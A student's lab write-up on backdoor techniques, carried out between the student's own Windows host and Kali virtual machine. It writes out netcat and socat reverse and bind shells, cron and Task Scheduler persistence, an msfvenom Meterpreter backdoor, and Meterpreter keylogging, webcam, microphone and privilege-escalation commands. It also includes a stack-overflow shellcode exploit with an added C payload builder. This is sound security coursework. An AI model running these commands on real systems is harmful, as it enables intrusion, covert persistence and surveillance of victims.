Table of Contents
- 2019-2020-2 20175216 "Network Countermeasures Technology" Exp2: Backdoor Principles and Practice
- Experimental preparation
- Experiment procedure
- 1. Use netcat to get the host's shell, started from cron
- 2. Use socat to get the host's shell, started from a scheduled task
- 3. Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and get the host's shell
- 4. Use MSF meterpreter (or other software) to capture audio, webcam images, keystrokes, etc. from the target host, and try privilege escalation
- Bonus: Inject shellcode generated with MSF into pwn1 from Exp1 and get a reverse-connection shell
- Experiment summary
2019-2020-2 20175216 "Network Countermeasures Technology" Exp2: Backdoor Principles and Practice
Experimental preparation
1. Learning netcat
netcat is a low-level tool for sending and receiving raw TCP and UDP data. It is usually combined with other tools, and it can play the role of a backdoor. Linux generally ships with netcat (the Windows build used below is ncat.exe); `man netcat` or `man nc` shows its manual.
Windows gets a Linux shell
- Under Windows, run `ipconfig` and note the local IP, 192.168.2.130.
- Under Windows, listen on local port 5216 with `ncat.exe -l -p 5216`.
- Under Linux, connect back to Windows with `nc 192.168.2.130 5216 -e /bin/sh`; the `-e` option runs `/bin/sh` with its input and output attached to the connection.
- Windows successfully obtains a Linux shell.
Linux gets a Windows shell
- Under Linux, run `ip addr` and note the IP address, 192.168.170.142.
- Under Linux, listen on port 5216 with `nc -l -p 5216`.
- Under Windows, connect back to port 5216 on the Linux host with `ncat.exe -e cmd.exe 192.168.170.142 5216`.
- Linux sees the Windows command prompt; `dir` lists the files in the D:\20175216zxy\ncat directory.
Transmitting data with nc
- Under Windows, listen on port 5216 with `ncat.exe -l 5216`.
- Under Linux, connect to port 5216 on the Windows host with `nc 192.168.2.130 5216`; whatever is typed at either end is delivered to the other.
Transferring files with nc
Linux sends a file to Windows
- Under Windows, listen on port 5216 and redirect whatever arrives into a file: `ncat.exe -l 5216 > 20175216.txt`.
- Under Linux, connect to port 5216 on the Windows host with the file as standard input: `nc 192.168.2.130 5216 < zxy.txt`. Windows receives the file sent by Linux.
Windows sends a file to Linux
- Under Kali, listen on port 5216: `nc -l -p 5216 > 20175216.txt`.
- Under Windows, connect to port 5216 on the Linux host: `ncat.exe 192.168.170.142 5216 < zxy.txt`. Linux receives the file sent by Windows.
- nc neither authenticates the peer nor checks that the transfer is complete, so compare a hash of the file on both sides before trusting it.
2. Learning socat
- socat is an enhanced version of ncat. Its usage is `socat [options] <address> <address>`: the two addresses are mandatory, the options are optional.
- socat's basic function is to create two bidirectional byte streams and transfer data between them; each address argument describes one end of the transfer. A "stream" here is a flow of data, and because the data can be of many different types, the command offers a large number of options to define and describe each kind of stream.
Experiment procedure
1. Use netcat to get the host's shell, started from cron
- Under Windows, listen on port 5216 with `ncat.exe -l -p 5216`.
- cron is the scheduled-task service on Linux: it wakes up every minute and runs whatever the crontab configuration says is due. `man cron` has the details.
- `crontab -e` edits the current user's crontab (`-e` means edit). Add the line `45 * * * * /bin/netcat 192.168.2.130 5216 -e /bin/sh` at the end: at minute 45 of every hour it connects back to port 5216 on the Windows host. `crontab -l` shows the entry that was saved, and deleting the line again (or `crontab -r`) removes the persistence once the experiment is over.
- At 10:45 the Kali shell arrives; `ls` lists the directory.
2. Use socat to get the host's shell, started from a scheduled task
- Under Windows, right-click the Start button (or This PC), open Computer Management, find Task Scheduler under System Tools and create a task.
- On the General tab, name the task exp. On the Triggers tab click New Trigger; I chose "On workstation lock" and clicked OK.
- On the Actions tab, enter the path of socat.exe from the downloaded and unpacked archive as the program, and fill in `tcp-listen:5216 exec:cmd.exe,pty,stderr` under Add arguments (this binds cmd.exe to port 5216 and at the same time redirects cmd.exe's stderr to stdout). Click OK to finish creating the task.
- Lock the computer and unlock it again; socat starts.
- On Kali, run `socat - tcp:192.168.2.130:5216` (`-` stands for standard input/output; the second stream is port 5216 on the Windows host, whose IP is 192.168.2.130). The cmd shell is obtained.
3. Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, and get the host's shell
- On Kali, run `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f exe > 20175216_backdoor.exe` (the IP is Kali's) to generate the backdoor 20175216_backdoor.exe.
- Under Windows, run `ncat.exe -lv 5216 > 20175216_backdoor.exe` (`-v` shows the connection status).
- On Kali, run `nc 192.168.2.130 5216 < 20175216_backdoor.exe` (the IP is the Windows host's) to send the generated backdoor to the Windows host. The transfer succeeds.
- Open another terminal on Linux and enter the console with `msfconsole`.
- `use exploit/multi/handler` selects the listener module. Set the payload to the same one the backdoor was generated with: `set payload windows/meterpreter/reverse_tcp`.
- `set LHOST 192.168.170.142` (Kali's IP, the same one given when generating the backdoor), and the same port: `set LPORT 5216`.
- After the setup is complete, `exploit` starts listening.
- When the backdoor is run on the Windows host, Kali receives the connection and gets a meterpreter shell with remote control of the host.
4. Use MSF meterpreter (or other software) to capture audio, webcam images, keystrokes, etc. from the target host, and try privilege escalation
- Record audio: `record_mic`
- Take a picture with the webcam: `webcam_snap`
- Take a screenshot: `screenshot`
- Start recording keystrokes: `keyscan_start`; read the recorded keystrokes: `keyscan_dump`
- Show the current user: `getuid`; try to escalate privileges: `getsystem`
Bonus: Inject shellcode generated with MSF into pwn1 from Exp1 and get a reverse-connection shell
- Following a senior classmate's blog, I downloaded the ready-generated reverse-connection shellcode directly from the linked shellcode page. It connects back to 127.0.0.1:4444, which is why the handler below is set to those values:
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80
- Make the stack executable and turn off address randomization:
execstack -s 20175216pwn    # make the stack of 20175216pwn executable
execstack -q 20175216pwn    # query whether the file's stack is executable
more /proc/sys/kernel/randomize_va_space    # show the address-randomization state
echo "0" > /proc/sys/kernel/randomize_va_space    # turn off address randomization
- Run pwn1 with a test input whose return-address slot holds the placeholder bytes \x4\x3\x2\x1 followed by the shellcode, then start gdb in another terminal and connect to the process with `attach 2087` (2087 being its PID).
- Enter `disassemble foo` to disassemble the foo function, then set a breakpoint with `break *0x080484ae` so the process stops inside foo just before the overwritten return address is used, which is the moment to look at the memory where buf was injected.
- Go back to the first terminal and press Enter, then return to the debugging terminal and enter `c` to continue.
- Enter `info r esp` to see where the stack pointer is, and examine the data stored at that address.
- \x4\x3\x2\x1 is indeed at the top of the stack, so that is where the return address lives: 0xffffd31c. The shellcode sits right next to it, so the address to jump to is 0xffffd31c+4 = 0xffffd320.
- Write the return address followed by the reverse-connection shellcode into the file shellcodeinput:
perl -e 'print "A" x 32;print"\x20\xd3\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > shellcodeinput
- Start a new terminal b and set up the handler:
msfconsole
use exploit/multi/handler    # the handler module, used to set the payload
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1    # the loopback address, as encoded in the shellcode
set LPORT 4444    # the port encoded in the shellcode
exploit    # setup complete, start listening
- In another terminal run `(cat shellcodeinput; cat) | ./20175216pwn` (the trailing `cat` keeps the program's standard input open after the payload has been sent). The handler receives the connection and the shell is obtained.
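The perl one-liner above, rebuilt in C as an added example (not code from the original post) that also performs the two checks worth doing before piping the file into pwn1: it recovers the callback address and port encoded in the shellcode, so they can be compared against the handler's LHOST/LPORT, and it counts bytes that would cut the input short. The 32-byte padding, the return address 0xffffd320 and the shellcode bytes are the post's; the output file name and the assumption that pwn1 reads its input with a gets()-style call (so a 0x0a byte would end the read early) are mine.

```c
/* Added example (not code from the original post): build the same input
 * that the perl one-liner writes to shellcodeinput and sanity-check it
 * before piping it into pwn1. The 32-byte padding, the return address
 * 0xffffd320 and the shellcode bytes come from the post; the output file
 * name and the assumption that pwn1 reads stdin with a gets()-style call
 * (so a 0x0a byte would cut the payload short) are mine. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* linux/x86 shell_reverse_tcp blob from the post (calls back to 127.0.0.1:4444) */
static const unsigned char SHELLCODE[] = {
    0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0x66,0xb8,0x67,0x01,0xb3,0x02,0xb1,0x01,
    0xcd,0x80,0x89,0xc3,0xb8,0x80,0xff,0xff,0xfe,0x83,0xf0,0xff,0x50,0x66,0x68,0x11,
    0x5c,0x66,0x6a,0x02,0x89,0xe1,0xb2,0x10,0x31,0xc0,0x66,0xb8,0x6a,0x01,0xcd,0x80,
    0x85,0xc0,0x75,0x24,0x31,0xc9,0xb1,0x02,0x31,0xc0,0xb0,0x3f,0xcd,0x80,0x49,0x79,
    0xf9,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,
    0x31,0xc9,0x31,0xd2,0xb0,0x0b,0xcd,0x80,0xb3,0x01,0x31,0xc0,0xb0,0x01,0xcd,0x80
};
#define SHELLCODE_LEN (sizeof SHELLCODE)
#define PAD_LEN  32              /* "A" x 32 reaches the saved return address */
#define RET_ADDR 0xffffd320u     /* esp at the breakpoint + 4, from the post */

/* Write padding, little-endian return address and shellcode into out.
 * Returns the payload length, or 0 if cap is too small. */
size_t build_payload(unsigned char *out, size_t cap)
{
    size_t n = PAD_LEN + 4 + SHELLCODE_LEN;
    if (cap < n)
        return 0;
    memset(out, 'A', PAD_LEN);
    out[PAD_LEN + 0] = (unsigned char)(RET_ADDR & 0xff);          /* 0x20 */
    out[PAD_LEN + 1] = (unsigned char)((RET_ADDR >> 8) & 0xff);   /* 0xd3 */
    out[PAD_LEN + 2] = (unsigned char)((RET_ADDR >> 16) & 0xff);  /* 0xff */
    out[PAD_LEN + 3] = (unsigned char)((RET_ADDR >> 24) & 0xff);  /* 0xff */
    memcpy(out + PAD_LEN + 4, SHELLCODE, SHELLCODE_LEN);
    return n;
}

/* Recover LHOST/LPORT from this blob's encoding: the address is
 * `mov eax, ~ip` (b8 imm32) followed by `xor eax, -1` (83 f0 ff), which keeps
 * the null bytes of 127.0.0.1 out of the shellcode; the port is `pushw imm16`
 * (66 68) already in network byte order. Returns 0 when both were found. */
int decode_callback(const unsigned char *sc, size_t len, char ip[16], uint16_t *port)
{
    int have_ip = 0, have_port = 0;
    size_t i;
    for (i = 0; i + 8 <= len; i++) {
        if (!have_ip && sc[i] == 0xb8 &&
            sc[i + 5] == 0x83 && sc[i + 6] == 0xf0 && sc[i + 7] == 0xff) {
            /* push eax stores the inverted dword little-endian, which is exactly
             * sin_addr's byte order, so inverting byte by byte yields a.b.c.d */
            snprintf(ip, 16, "%u.%u.%u.%u", sc[i + 1] ^ 0xffu, sc[i + 2] ^ 0xffu,
                     sc[i + 3] ^ 0xffu, sc[i + 4] ^ 0xffu);
            have_ip = 1;
        } else if (!have_port && sc[i] == 0x66 && sc[i + 1] == 0x68) {
            *port = (uint16_t)((sc[i + 2] << 8) | sc[i + 3]);
            have_port = 1;
        }
    }
    return (have_ip && have_port) ? 0 : -1;
}

/* Count bytes that end an input early: 0x0a for gets()/fgets(), 0x00 for
 * strcpy()-style copies. Both must be absent from the whole payload. */
int count_bad_bytes(const unsigned char *buf, size_t len)
{
    int n = 0;
    size_t i;
    for (i = 0; i < len; i++)
        if (buf[i] == 0x00 || buf[i] == 0x0a)
            n++;
    return n;
}

int main(void)
{
    unsigned char payload[256];
    char ip[16] = "?";
    uint16_t port = 0;
    size_t n = build_payload(payload, sizeof payload);
    FILE *f;

    if (decode_callback(SHELLCODE, SHELLCODE_LEN, ip, &port) == 0)
        printf("shellcode calls back to %s:%u, so the handler needs LHOST %s and LPORT %u\n",
               ip, port, ip, port);
    printf("payload: %zu bytes, %d byte(s) that would end a line-oriented read\n",
           n, count_bad_bytes(payload, n));
    f = fopen("shellcodeinput", "wb");     /* same file name the post uses */
    if (f == NULL || fwrite(payload, 1, n, f) != n) {
        perror("shellcodeinput");
        return 1;
    }
    fclose(f);
    return 0;
}
```

Compile with gcc and run it to produce shellcodeinput; a different return address from gdb or a freshly generated shellcode only needs the constants changed. The decoder knows only this blob's mov-and-xor address trick and pushw port, and returns -1 for shellcode that encodes them differently, which is the cue to read the bytes by hand before trusting the handler settings.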
Experiment summary
Problems encountered during the experiment
- After running the backdoor file 20175216_backdoor.exe on Windows, Kali did not receive the connection.
- Solution: the IP address and port number were correct, and the firewall and anti-virus software had been turned off; restarting the virtual machine did not help, and in the end restarting the computer fixed it. Really, ninety percent of problems can be solved by a restart, and the remaining ten percent by reinstalling the system.
Answers to the basic questions
- Give examples of ways a backdoor might get onto your system.
Downloading installation packages from websites, downloading pirated software, and plugging a phone into someone else's computer to charge it when it is out of power.
- Give examples of how a backdoor can be started (on Windows and Linux).
On Linux, by modifying the cron configuration or by injecting shellcode; on Windows, through a Trojan-horse backdoor.
- Which Meterpreter functions impressed you most?
Taking screenshots through the backdoor, turning on the camera, and capturing audio.
- How would you find out whether a backdoor has been installed on your system?
Turn on Windows Defender, check the registry, and scan with anti-virus software.
Experiment reflections
Through this experiment I learned a lot about backdoors. It reminded me that last November my phone's battery died and I charged it on a senior student's computer, after which he saw my phone's messages through remote control. Thankfully that senior had the knowledge; had the information flowed into the wrong hands, the consequences could have been disastrous. As the saying goes, to forge iron the smith must be strong himself: what we learned in this experiment is only the tip of the backdoor iceberg, and only through continuous learning and thinking, and by raising our own security awareness, can we reduce the risk of being attacked.